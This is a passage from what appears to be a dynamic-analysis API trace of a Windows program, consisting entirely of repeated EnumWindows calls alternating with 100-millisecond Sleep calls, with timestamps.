(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.485] Sleep (dwMilliseconds=0x64) [0284.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.508] Sleep (dwMilliseconds=0x64) [0284.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.546] Sleep (dwMilliseconds=0x64) [0284.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.581] Sleep (dwMilliseconds=0x64) [0284.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.595] Sleep (dwMilliseconds=0x64) [0284.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.635] Sleep (dwMilliseconds=0x64) [0284.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.677] Sleep (dwMilliseconds=0x64) [0284.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.702] Sleep (dwMilliseconds=0x64) [0284.730] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.730] Sleep (dwMilliseconds=0x64) [0284.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.771] Sleep (dwMilliseconds=0x64) [0284.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.814] Sleep (dwMilliseconds=0x64) [0284.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.822] Sleep (dwMilliseconds=0x64) [0284.859] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.860] Sleep (dwMilliseconds=0x64) [0284.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.903] Sleep (dwMilliseconds=0x64) [0284.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.942] Sleep (dwMilliseconds=0x64) [0284.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.948] Sleep (dwMilliseconds=0x64) [0284.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.987] Sleep (dwMilliseconds=0x64) [0285.029] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.029] Sleep (dwMilliseconds=0x64) [0285.080] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.081] Sleep (dwMilliseconds=0x64) [0285.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.089] Sleep (dwMilliseconds=0x64) [0285.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.128] Sleep (dwMilliseconds=0x64) [0285.168] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.169] Sleep (dwMilliseconds=0x64) [0285.173] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.174] Sleep (dwMilliseconds=0x64) [0285.228] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.228] Sleep (dwMilliseconds=0x64) [0285.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.269] Sleep (dwMilliseconds=0x64) [0285.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.284] Sleep (dwMilliseconds=0x64) [0285.313] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.314] Sleep (dwMilliseconds=0x64) [0285.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.352] Sleep (dwMilliseconds=0x64) [0285.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.382] Sleep (dwMilliseconds=0x64) [0285.396] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.396] Sleep (dwMilliseconds=0x64) [0285.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.439] Sleep (dwMilliseconds=0x64) [0285.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.480] Sleep (dwMilliseconds=0x64) [0285.525] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.525] Sleep (dwMilliseconds=0x64) [0285.568] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.568] Sleep (dwMilliseconds=0x64) [0285.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.579] Sleep (dwMilliseconds=0x64) [0285.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.617] Sleep (dwMilliseconds=0x64) [0285.656] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.657] Sleep (dwMilliseconds=0x64) [0285.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.689] Sleep (dwMilliseconds=0x64) [0285.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.699] Sleep (dwMilliseconds=0x64) [0285.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.741] Sleep (dwMilliseconds=0x64) [0285.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.781] Sleep (dwMilliseconds=0x64) [0285.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.793] Sleep (dwMilliseconds=0x64) [0285.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.820] Sleep (dwMilliseconds=0x64) [0285.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.886] Sleep (dwMilliseconds=0x64) [0285.933] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.934] Sleep (dwMilliseconds=0x64) [0285.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.946] Sleep (dwMilliseconds=0x64) [0285.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0285.988] Sleep (dwMilliseconds=0x64) [0286.029] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.031] Sleep (dwMilliseconds=0x64) [0286.068] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.068] Sleep (dwMilliseconds=0x64) [0286.087] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.087] Sleep (dwMilliseconds=0x64) [0286.129] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.130] Sleep (dwMilliseconds=0x64) [0286.168] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.189] Sleep (dwMilliseconds=0x64) [0286.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.233] Sleep (dwMilliseconds=0x64) [0286.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.273] Sleep (dwMilliseconds=0x64) [0286.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.317] Sleep (dwMilliseconds=0x64) [0286.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.333] Sleep (dwMilliseconds=0x64) [0286.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.364] Sleep (dwMilliseconds=0x64) [0286.408] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.408] Sleep (dwMilliseconds=0x64) [0286.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.449] Sleep (dwMilliseconds=0x64) [0286.489] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.491] Sleep (dwMilliseconds=0x64) [0286.530] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.530] Sleep (dwMilliseconds=0x64) [0286.565] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.566] Sleep (dwMilliseconds=0x64) [0286.573] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.573] Sleep (dwMilliseconds=0x64) [0286.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.611] Sleep (dwMilliseconds=0x64) [0286.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.654] Sleep (dwMilliseconds=0x64) [0286.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.718] Sleep (dwMilliseconds=0x64) [0286.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.744] Sleep (dwMilliseconds=0x64) [0286.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.781] Sleep (dwMilliseconds=0x64) [0286.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.810] Sleep (dwMilliseconds=0x64) [0286.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.821] Sleep (dwMilliseconds=0x64) [0286.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.856] Sleep (dwMilliseconds=0x64) [0286.891] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.892] Sleep (dwMilliseconds=0x64) [0286.895] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.896] Sleep (dwMilliseconds=0x64) [0286.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.932] Sleep (dwMilliseconds=0x64) [0286.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.968] Sleep (dwMilliseconds=0x64) [0286.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0286.975] Sleep (dwMilliseconds=0x64) [0287.006] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.007] Sleep (dwMilliseconds=0x64) [0287.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.051] Sleep (dwMilliseconds=0x64) [0287.063] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.064] Sleep (dwMilliseconds=0x64) [0287.090] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.090] Sleep (dwMilliseconds=0x64) [0287.126] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.127] Sleep (dwMilliseconds=0x64) [0287.153] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.153] Sleep (dwMilliseconds=0x64) [0287.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.167] Sleep (dwMilliseconds=0x64) [0287.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.221] Sleep (dwMilliseconds=0x64) [0287.253] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.254] Sleep (dwMilliseconds=0x64) [0287.259] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.260] Sleep (dwMilliseconds=0x64) [0287.300] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.301] Sleep (dwMilliseconds=0x64) [0287.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.340] Sleep (dwMilliseconds=0x64) [0287.363] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.363] Sleep (dwMilliseconds=0x64) [0287.380] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.381] Sleep (dwMilliseconds=0x64) [0287.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.419] Sleep (dwMilliseconds=0x64) [0287.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.457] Sleep (dwMilliseconds=0x64) [0287.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.472] Sleep (dwMilliseconds=0x64) [0287.500] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.500] Sleep (dwMilliseconds=0x64) [0287.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.537] Sleep (dwMilliseconds=0x64) [0287.575] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.576] Sleep (dwMilliseconds=0x64) [0287.585] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.586] Sleep (dwMilliseconds=0x64) [0287.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.617] Sleep (dwMilliseconds=0x64) [0287.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.661] Sleep (dwMilliseconds=0x64) [0287.697] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.698] Sleep (dwMilliseconds=0x64) [0287.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.703] Sleep (dwMilliseconds=0x64) [0287.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.739] Sleep (dwMilliseconds=0x64) [0287.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.778] Sleep (dwMilliseconds=0x64) [0287.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.808] Sleep (dwMilliseconds=0x64) [0287.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.821] Sleep (dwMilliseconds=0x64) [0287.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.859] Sleep (dwMilliseconds=0x64) [0287.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.898] Sleep (dwMilliseconds=0x64) [0287.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.915] Sleep (dwMilliseconds=0x64) [0287.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0287.940] Sleep (dwMilliseconds=0x64) [0288.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.012] Sleep (dwMilliseconds=0x64) [0288.093] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.093] Sleep (dwMilliseconds=0x64) [0288.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.107] Sleep (dwMilliseconds=0x64) [0288.139] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.140] Sleep (dwMilliseconds=0x64) [0288.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.179] Sleep (dwMilliseconds=0x64) [0288.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.233] Sleep (dwMilliseconds=0x64) [0288.237] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.237] Sleep (dwMilliseconds=0x64) [0288.247] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.248] Sleep (dwMilliseconds=0x64) [0288.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.285] Sleep (dwMilliseconds=0x64) [0288.325] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.325] Sleep (dwMilliseconds=0x64) [0288.347] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.347] Sleep (dwMilliseconds=0x64) [0288.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.367] Sleep (dwMilliseconds=0x64) [0288.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.426] Sleep (dwMilliseconds=0x64) [0288.464] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.465] Sleep (dwMilliseconds=0x64) [0288.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.474] Sleep (dwMilliseconds=0x64) [0288.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.504] Sleep (dwMilliseconds=0x64) [0288.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.546] Sleep (dwMilliseconds=0x64) [0288.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.572] Sleep (dwMilliseconds=0x64) [0288.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.587] Sleep (dwMilliseconds=0x64) [0288.625] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.626] Sleep (dwMilliseconds=0x64) [0288.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.740] Sleep (dwMilliseconds=0x64) [0288.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.791] Sleep (dwMilliseconds=0x64) [0288.849] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.849] Sleep (dwMilliseconds=0x64) [0288.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.924] Sleep (dwMilliseconds=0x64) [0288.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.954] Sleep (dwMilliseconds=0x64) [0288.965] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0288.965] Sleep (dwMilliseconds=0x64) [0289.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.002] Sleep (dwMilliseconds=0x64) [0289.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.177] Sleep (dwMilliseconds=0x64) [0289.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.184] Sleep (dwMilliseconds=0x64) [0289.243] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.244] Sleep (dwMilliseconds=0x64) [0289.282] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.282] Sleep (dwMilliseconds=0x64) [0289.304] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.304] Sleep (dwMilliseconds=0x64) [0289.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.322] Sleep (dwMilliseconds=0x64) [0289.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.359] Sleep (dwMilliseconds=0x64) [0289.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.401] Sleep (dwMilliseconds=0x64) [0289.403] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.403] Sleep (dwMilliseconds=0x64) [0289.438] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.438] Sleep (dwMilliseconds=0x64) [0289.475] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.476] Sleep (dwMilliseconds=0x64) [0289.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.487] Sleep (dwMilliseconds=0x64) [0289.517] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.517] Sleep (dwMilliseconds=0x64) [0289.556] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.556] Sleep (dwMilliseconds=0x64) [0289.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.579] Sleep (dwMilliseconds=0x64) [0289.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.596] Sleep (dwMilliseconds=0x64) [0289.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.637] Sleep (dwMilliseconds=0x64) [0289.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.712] Sleep (dwMilliseconds=0x64) [0289.715] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.715] Sleep (dwMilliseconds=0x64) [0289.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.755] Sleep (dwMilliseconds=0x64) [0289.794] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.794] Sleep (dwMilliseconds=0x64) [0289.813] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.813] Sleep (dwMilliseconds=0x64) [0289.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.833] Sleep (dwMilliseconds=0x64) [0289.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.871] Sleep (dwMilliseconds=0x64) [0289.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.900] Sleep (dwMilliseconds=0x64) [0289.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.946] Sleep (dwMilliseconds=0x64) [0289.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.987] Sleep (dwMilliseconds=0x64) [0289.988] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0289.988] Sleep (dwMilliseconds=0x64) [0290.031] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.034] Sleep (dwMilliseconds=0x64) [0290.087] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.087] Sleep (dwMilliseconds=0x64) [0290.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.122] Sleep (dwMilliseconds=0x64) [0290.127] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.128] Sleep (dwMilliseconds=0x64) [0290.167] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.168] Sleep (dwMilliseconds=0x64) [0290.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.227] Sleep (dwMilliseconds=0x64) [0290.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.255] Sleep (dwMilliseconds=0x64) [0290.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.269] Sleep (dwMilliseconds=0x64) [0290.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.307] Sleep (dwMilliseconds=0x64) [0290.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.346] Sleep (dwMilliseconds=0x64) [0290.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.366] Sleep (dwMilliseconds=0x64) [0290.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.390] Sleep (dwMilliseconds=0x64) [0290.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.429] Sleep (dwMilliseconds=0x64) [0290.466] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.466] Sleep (dwMilliseconds=0x64) [0290.470] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.470] Sleep (dwMilliseconds=0x64) [0290.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.504] Sleep (dwMilliseconds=0x64) [0290.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.541] Sleep (dwMilliseconds=0x64) [0290.550] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.550] Sleep (dwMilliseconds=0x64) [0290.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.578] Sleep (dwMilliseconds=0x64) [0290.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.616] Sleep (dwMilliseconds=0x64) [0290.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.630] Sleep (dwMilliseconds=0x64) [0290.653] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.653] Sleep (dwMilliseconds=0x64) [0290.696] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.697] Sleep (dwMilliseconds=0x64) [0290.735] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.735] Sleep (dwMilliseconds=0x64) [0290.737] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.737] Sleep (dwMilliseconds=0x64) [0290.738] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.739] Sleep (dwMilliseconds=0x64) [0290.775] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.776] Sleep (dwMilliseconds=0x64) [0290.813] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.813] Sleep (dwMilliseconds=0x64) [0290.824] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.824] Sleep (dwMilliseconds=0x64) [0290.852] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.852] Sleep (dwMilliseconds=0x64) [0290.894] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.895] Sleep (dwMilliseconds=0x64) [0290.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.921] Sleep (dwMilliseconds=0x64) [0290.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.934] Sleep (dwMilliseconds=0x64) [0290.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0290.970] Sleep (dwMilliseconds=0x64) [0291.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.007] Sleep (dwMilliseconds=0x64) [0291.009] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.009] Sleep (dwMilliseconds=0x64) [0291.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.062] Sleep (dwMilliseconds=0x64) [0291.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.103] Sleep (dwMilliseconds=0x64) [0291.116] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.117] Sleep (dwMilliseconds=0x64) [0291.143] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.143] Sleep (dwMilliseconds=0x64) [0291.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.183] Sleep (dwMilliseconds=0x64) [0291.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.244] Sleep (dwMilliseconds=0x64) [0291.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.250] Sleep (dwMilliseconds=0x64) [0291.287] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.287] Sleep (dwMilliseconds=0x64) [0291.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.335] Sleep (dwMilliseconds=0x64) [0291.351] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.351] Sleep (dwMilliseconds=0x64) [0291.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.379] Sleep (dwMilliseconds=0x64) [0291.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.419] Sleep (dwMilliseconds=0x64) [0291.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.562] Sleep (dwMilliseconds=0x64) [0291.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.566] Sleep (dwMilliseconds=0x64) [0291.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.607] Sleep (dwMilliseconds=0x64) [0291.644] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.644] Sleep (dwMilliseconds=0x64) [0291.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.658] Sleep (dwMilliseconds=0x64) [0291.698] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.698] Sleep (dwMilliseconds=0x64) [0291.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.742] Sleep (dwMilliseconds=0x64) [0291.766] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.766] Sleep (dwMilliseconds=0x64) [0291.782] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.782] Sleep (dwMilliseconds=0x64) [0291.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.821] Sleep (dwMilliseconds=0x64) [0291.860] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.862] Sleep (dwMilliseconds=0x64) [0291.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.868] Sleep (dwMilliseconds=0x64) [0291.901] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.901] Sleep (dwMilliseconds=0x64) [0291.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.942] Sleep (dwMilliseconds=0x64) [0291.958] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.959] Sleep (dwMilliseconds=0x64) [0291.981] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0291.981] Sleep (dwMilliseconds=0x64) [0292.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.019] Sleep (dwMilliseconds=0x64) [0292.048] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.048] Sleep (dwMilliseconds=0x64) [0292.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.069] Sleep (dwMilliseconds=0x64) [0292.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.107] Sleep (dwMilliseconds=0x64) [0292.148] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.148] Sleep (dwMilliseconds=0x64) [0292.187] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0292.188] Sleep (dwMilliseconds=0x64) [0292.279] EnumWindows (lpEnumFunc=0x2843dc0, 